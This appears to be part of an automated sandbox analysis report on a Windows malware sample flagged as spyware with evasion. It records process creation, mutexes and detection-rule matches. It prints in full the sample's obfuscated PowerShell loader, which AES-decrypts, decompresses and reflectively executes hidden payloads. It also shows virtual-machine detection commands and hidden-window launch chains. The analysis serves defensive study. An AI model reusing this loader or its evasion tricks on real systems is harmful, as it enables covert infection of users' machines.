Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_0000017C6DA8CE18	37_3_0000017C6DA8CE18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_0000017C6DA8CC94	37_3_0000017C6DA8CC94
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140001CF0	37_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140002D4C	37_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140003204	37_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140002434	37_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140001274	37_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DAB2FF0	37_2_0000017C6DAB2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABDA18	37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABD894	37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD72FF0	37_2_0000017C6DD72FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7DA18	37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7D894	37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_00000225DC61CE18	38_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_00000225DC6123F0	38_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_00000225DC61CC94	38_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64DA18	38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC642FF0	38_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64D894	38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67DA18	38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC672FF0	38_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67D894	38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_00000202C0ABCE18	39_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_00000202C0ABCC94	39_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_00000202C0AB23F0	39_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AEDA18	39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AED894	39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AE2FF0	39_2_00000202C0AE2FF0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1DA18	39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1D894	39_2_00000202C0B1D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B12FF0	39_2_00000202C0B12FF0
Source: C:\Windows\System32\svchost.exe	Code function: 40_3_000002A6612DCE18	40_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exe	Code function: 40_3_000002A6612D23F0	40_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exe	Code function: 40_3_000002A6612DCC94	40_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130DA18	40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A661302FF0	40_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130D894	40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAEDCCE18	41_3_000002BAAEDCCE18
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAEDC23F0	41_3_000002BAAEDC23F0
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAEDCCC94	41_3_000002BAAEDCCC94
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAED9CE18	41_3_000002BAAED9CE18
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAED923F0	41_3_000002BAAED923F0
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAED9CC94	41_3_000002BAAED9CC94
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCDA18	41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDC2FF0	41_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCD894	41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFDA18	41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDF2FF0	41_2_000002BAAEDF2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFD894	41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_3_0000027052A123F0	42_3_0000027052A123F0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_3_0000027052A1CC94	42_3_0000027052A1CC94
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_3_0000027052A1CE18	42_3_0000027052A1CE18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_0000027053062FF0	42_2_0000027053062FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306DA18	42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306D894	42_2_000002705306D894

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682
Source: unknown	Process created: Commandline size = 5571
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.49.dr	Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.49.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr	Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}

Source: classification engine

Classification label: mal100.spyw.evad.winCMD@55/94@1/1

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

37_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 34_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

34_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 34_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

34_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20241003

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\6983353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\5387306
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\8404857
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3852
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kp2q3ph.fnd.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementation